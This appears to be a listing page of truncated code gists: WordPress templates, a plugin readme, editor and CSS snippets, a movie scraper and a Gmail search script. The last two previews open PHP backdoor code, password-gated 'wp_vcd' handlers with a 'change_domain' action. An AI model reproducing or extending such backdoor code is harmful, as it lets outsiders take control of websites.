This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<div id="content" class="narrowcolumn"> | |
<!-- This sets the $curauth variable --> | |
<?php if(isset($_GET['author_name'])) : $curauth = get_userdatabylogin($author_name); else : $curauth = get_userdata(intval($author)); endif; ?> | |
<h3>About: <?php echo $curauth->display_name; ?></h3> | |
<strong>Website:</strong> <a href="<?php echo $curauth->user_url; ?>"><?php echo $curauth->user_url; ?></a> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
=== Plugin Name === | |
Contributors: (this should be a list of wordpress.org userid's) | |
Donate link: https://example.com/ | |
Tags: comments, spam | |
Requires at least: 4.8 | |
Tested up to: 5.3 | |
Stable tag: 5.2 | |
Requires PHP: 5.2.4 | |
License: GPLv2 or later | |
License URI: https://www.gnu.org/licenses/gpl-2.0.html |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import MediumEditor from 'medium-editor'; | |
import './html-editor.fontsize.extension.scss'; | |
/** | |
* CompanyFontSizes | |
* A simple extension to allow the selection of font size directly in the action toolbar | |
*/ | |
const CompanyFontSizes = MediumEditor.Extension.extend({ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* 767px and above screen sizes */ | |
@media only screen and (min-width:767px){ | |
/* Mkdf sidebar */ | |
.mkdf-wrapper .mkdf-sidebar-standard .mkdf-sidebar{ | |
display: none; | |
} | |
/* Column 10/12 */ | |
.mkdf-wrapper .mkdf-page-content-holder{ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* 767px and below screen sizes */ | |
@media only screen and (max-width:767px){ | |
/* Mkdf sidebar */ | |
.mkdf-wrapper .mkdf-sidebar-standard .mkdf-sidebar{ | |
display: block; | |
margin-top:-180px!important; | |
border-color: transparent; | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: UTF-8 -*- | |
from splinter import Browser | |
import sys | |
executable_path = {'executable_path':'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe'} | |
#browser = Browser('chrome', **executable_path) | |
movie_titles = [] | |
movie_ratings = [] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
add_filter( 'woocommerce_return_to_shop_redirect', 'custom_change_return_shop_url' ); | |
function custom_change_return_shop_url() { | |
return 'https://pluginsbay.com/plugins/'; | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function searchGmail() { | |
var threads = GmailApp.search("from:paypal", 0, 10); | |
var sheet = SpreadsheetApp.getActiveSheet(); | |
var header = sheet.getRange(1, 1, 1, sheet.getLastColumn()).getValues()[0]; | |
for (var t=0; t<threads.length; t++) { | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '6ebe0d01459d18d46880e966a230cec1')) | |
{ | |
$div_code_name="wp_vcd"; | |
switch ($_REQUEST['action']) | |
{ | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '429acb1c29e4800452a3538a8f91edd0')) | |
{ | |
$div_code_name="wp_vcd"; | |
switch ($_REQUEST['action']) | |
{ | |
case 'change_domain'; | |
if (isset($_REQUEST['newdomain'])) | |
{ | |
if (!empty($_REQUEST['newdomain'])) |